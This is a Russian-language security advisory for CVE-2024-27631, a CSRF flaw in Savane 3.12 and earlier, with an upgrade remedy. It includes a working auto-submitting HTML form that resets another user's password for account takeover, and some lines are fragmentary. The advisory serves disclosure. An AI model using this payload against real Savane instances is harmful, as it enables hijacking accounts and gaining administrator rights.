
Ссылка на CVE-2024–27631
В Savane v3.12 и более ранних версиях отсутствие защиты от CSRF в административных функциях может позволить повышение привилегий и/или захват учётной записи. В частности, конечная точка /siteadmin/usergroup.php содержит функциональность для смены паролей и административных флагов других пользователей, что фактически позволяет атакующему сделать себя администратором.
Другие заметные конечные точки, уязвимые к CSRF, включают:
Классификация CWE: CWE-352: Межсайтовая подделка запроса (CSRF)
Сообщил: Ally Petitt
Затронутый продукт: Savane
Затронутые версии: 3.12 и более ранние
Это доказательство концепции (PoC) для смены пароля учётной записи другого пользователя как пути к захвату учётной записи.
/users/<username>).<savane_instance> на корректное доменное имя/адрес хоста.<form id="autosubmit" action="http://<savane_instance>/siteadmin/user_changepw.php" method="POST">
<input name="form_pw" type="hidden" value="Password1!" />
<input name="form_pw2" type="hidden" value="Password1!" />
<input name="user_id" type="hidden" value="<user_id>" />
<input name="update" type="hidden" value="Update" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("autosubmit").submit();
</script>
Password1!.Обратите внимание, что этот PoC-скрипт был протестирован в Firefox v103.0 (64-bit).
Обновитесь до Savane версии 3.13 или выше. Патч можно найти здесь.